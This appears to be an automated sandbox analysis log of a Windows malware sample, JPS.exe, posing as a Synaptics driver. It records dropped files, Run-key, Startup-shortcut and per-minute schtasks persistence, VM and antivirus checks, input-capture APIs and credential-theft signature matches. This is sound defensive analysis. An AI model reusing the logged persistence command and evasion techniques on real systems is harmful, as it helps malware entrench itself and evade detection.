                              Source: C:\Users\user\Desktop\._cache_JPS.exe Section loaded: apphelp.dll, iphlpapi.dll, mpr.dll, userenv.dll, uxtheme.dll, version.dll, wininet.dll, winmm.dll, wsock32.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, propsys.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, amsi.dll, profapi.dll, sxs.dll, sspicli.dll, linkinfo.dll, ntshrui.dll, srvcli.dll, cscapi.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: apphelp.dll, version.dll, wininet.dll, wsock32.dll, netapi32.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, textshaping.dll, profapi.dll, propsys.dll, ntmarta.dll, iertutil.dll, sspicli.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
                              Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, wbemcomn.dll
                              Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Section loaded: apphelp.dll, iphlpapi.dll, mpr.dll, userenv.dll, uxtheme.dll, version.dll, wininet.dll, winmm.dll, wsock32.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, propsys.dll
                              Source: C:\Users\user\Desktop\JPS.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                              Source: BQQQVU.lnk.2.dr, LNK file: ..\..\..\..\..\Windata\XNLAGO.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exe, File written: C:\Users\user\AppData\Local\Temp\KucYdd8.ini
                              Source: Window Recorder, Window detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                              Source: JPS.exe, Static file information: File size 1989120 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                              Source: JPS.exe, Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13b200
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00C3C140 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00C3C140
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A98D99 push edi; retn 0000h2_2_00A98D9B
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A98F0E push F7FFFFFFh; retn 0000h2_2_00A98F13
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB7795 push ecx; ret 2_2_00AB77A8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C167D9 push FEFC08C1h; ret 3_2_08C1679A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C167D9 push FEFC08C1h; ret 3_2_08C167E2
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C16670 push FEFC08C1h; ret 3_2_08C1679A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C16801 push FEFC08C1h; ret 3_2_08C16806
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C1679B push FEFC08C1h; ret 3_2_08C1679A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_08C1679B push FEFC08C1h; ret 3_2_08C167BE
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00738D99 push edi; retn 0000h10_2_00738D9B
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00738F0E push F7FFFFFFh; retn 0000h10_2_00738F13
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00757795 push ecx; ret 10_2_007577A8
                              Source: initial sample, Static PE information: section name: UPX0
                              Source: initial sample, Static PE information: section name: UPX1

                              Persistence and Installation Behavior

                              Source: C:\ProgramData\Synaptics\Synaptics.exe, File created: C:\Users\user\Documents\~$cache1
                              Source: C:\Users\user\Desktop\JPS.exe, File created: C:\Users\user\Desktop\._cache_JPS.exe
                              Source: C:\Users\user\Desktop\JPS.exe, File created: C:\ProgramData\Synaptics\RCX5246.tmp
                              Source: C:\Users\user\Desktop\JPS.exe, File created: C:\ProgramData\Synaptics\Synaptics.exe
                              Source: C:\Users\user\Desktop\._cache_JPS.exe, File created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe

                              Boot Survival

                              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_JPS.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnk
                              Source: C:\Users\user\Desktop\JPS.exe, Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
                              Source: C:\Users\user\Desktop\._cache_JPS.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BQQQVU
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00AAF78E
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AF7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00AF7F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_0074F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00797F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00797F0E
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00AB1E5A
                              Source: C:\ProgramData\Synaptics\Synaptics.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                              Source: C:\ProgramData\Synaptics\Synaptics.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                              Source: C:\Users\user\Desktop\JPS.exe, Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\._cache_JPS.exe, Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exe, Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exe, Window found: window name: WSH-Timer
                              Source: C:\Users\user\Desktop\._cache_JPS.exe, Window / User API: threadDelayed 5386
                              Source: C:\Users\user\Desktop\._cache_JPS.exe, Window / User API: foregroundWindowGot 1649
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe, Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                              Source: C:\Users\user\Desktop\._cache_JPS.exe, API coverage: 6.2 %
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe, API coverage: 3.7 %
                              Source: C:\Users\user\Desktop\._cache_JPS.exe TID: 7548, Thread sleep time: -53860s >= -30000s
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8120, Thread sleep count: 64 > 30
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8120, Thread sleep time: -3840000s >= -30000s
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8220, Thread sleep time: -60000s >= -30000s
                              Source: C:\Windows\SysWOW64\cmd.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                              Source: C:\Windows\SysWOW64\cmd.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                              Source: C:\Users\user\Desktop\._cache_JPS.exe, Last function: Thread delayed
                              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_JPS.exe, Thread sleep count: Count: 5386 delay: -10
                              Source: Yara match, File source: 00000002.00000002.2564672501.00000000040E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000007.00000002.2555561177.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000007.00000002.2554418377.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: Process Memory Space: ._cache_JPS.exe PID: 7544, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: wscript.exe PID: 7732, type: MEMORYSTR
                              Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AADD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00AADD92
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AE2044
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AE219F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00AE24A9
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00AD6B3F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00AD6E4A
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00ADF350
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00ADFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_00ADFDD2
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00ADFD47 FindFirstFileW,FindClose, 2_2_00ADFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_00782044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_00782044
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_0078219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0078219F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_007824A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_007824A9
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_00776B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 10_2_00776B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_00776E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 10_2_00776E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_0077F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0077F350
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_0077FD47 FindFirstFileW,FindClose, 10_2_0077FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_0077FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_0077FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_0074DD92 GetFileAttributesW,FindFirstFileW,FindClose, 10_2_0074DD92
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_00AAE47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Thread delayed: delay time: 60000
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Thread delayed: delay time: 60000
                              Source: C:\Users\user\Desktop\JPS.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                              Source: C:\Users\user\Desktop\JPS.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                              Source: C:\Users\user\Desktop\JPS.exe File opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\JPS.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\JPS.exe File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\JPS.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: Amcache.hve.19.dr Binary or memory string: VMware
                              Source: Amcache.hve.19.dr Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                              Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin
                              Source: Amcache.hve.19.dr Binary or memory string: VMware, Inc.
                              Source: Amcache.hve.19.dr Binary or memory string: VMware20,1hbin@
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
                              Source: Amcache.hve.19.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.19.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.19.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                              Source: Amcache.hve.19.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.19.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.19.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.19.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: ._cache_JPS.exe, 00000002.00000002.2559931458.0000000000E37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: Amcache.hve.19.dr Binary or memory string: vmci.sys
                              Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin`
                              Source: Amcache.hve.19.dr Binary or memory string: \driver\vmci,\driver\pci
                              Source: XNLAGO.exe, 00000015.00000003.1764337570.0000000001823000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: Amcache.hve.19.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: XNLAGO.exe, 00000014.00000003.1714498342.0000000001531000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
                              Source: Amcache.hve.19.dr Binary or memory string: VMware20,1
                              Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.19.dr Binary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.19.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.19.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.19.dr Binary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.19.dr Binary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.19.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.19.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Users\user\Desktop\._cache_JPS.exe API call chain: ExitProcess graph end node graph_2-106108
                              Source: C:\Users\user\Desktop\._cache_JPS.exe API call chain: ExitProcess graph end node graph_2-105919
                              Source: C:\Users\user\Desktop\._cache_JPS.exe API call chain: ExitProcess graph end node graph_2-105865
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AE703C BlockInput, 2_2_00AE703C
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00A9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW, 2_2_00A9374E
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AC46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 2_2_00AC46D0
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00C3C140 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00C3C140
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00ABA937 GetProcessHeap, 2_2_00ABA937
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AB8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00AB8E3C
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AB8E19 SetUnhandledExceptionFilter, 2_2_00AB8E19
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_00758E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00758E3C
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_00758E19 SetUnhandledExceptionFilter, 10_2_00758E19
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00ACBE95 LogonUserW, 2_2_00ACBE95
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00A9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW, 2_2_00A9374E
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AD4B52 SendInput,keybd_event, 2_2_00AD4B52
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AD7DD5 mouse_event, 2_2_00AD7DD5
                              Source: C:\Users\user\Desktop\JPS.exe Process created: C:\Users\user\Desktop\._cache_JPS.exe "C:\Users\user\Desktop\._cache_JPS.exe"
                              Source: C:\Users\user\Desktop\JPS.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00ACB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 2_2_00ACB398
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00ACBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 2_2_00ACBE31
                              Source: ._cache_JPS.exe, XNLAGO.exe Binary or memory string: Shell_TrayWnd
                              Source: ._cache_JPS.exe, 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp, XNLAGO.exe, 0000000A.00000002.1445228173.00000000007DE000.00000040.00000001.01000000.00000009.sdmp, XNLAGO.exe, 0000000D.00000002.1462282550.00000000007DE000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AB7254 cpuid 2_2_00AB7254
                              Source: C:\Users\user\Desktop\JPS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AB40DA GetSystemTimeAsFileTime,__aulldiv, 2_2_00AB40DA
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00B0C146 GetUserNameW, 2_2_00B0C146
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AC2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 2_2_00AC2C3C
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_00AAE47B
                              Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: Amcache.hve.19.dr Binary or memory string: msmpeng.exe
                              Source: ._cache_JPS.exe, 00000002.00000002.2559043843.0000000000E06000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\Desktop\._cache_JPS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              Source: Yara match File source: Process Memory Space: ._cache_JPS.exe PID: 7544, type: MEMORYSTR
                              Source: Yara match File source: JPS.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.JPS.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: JPS.exe PID: 7448, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 7604, type: MEMORYSTR
                              Source: Yara match File source: C:\ProgramData\Synaptics\RCX5246.tmp, type: DROPPED
                              Source: Yara match File source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
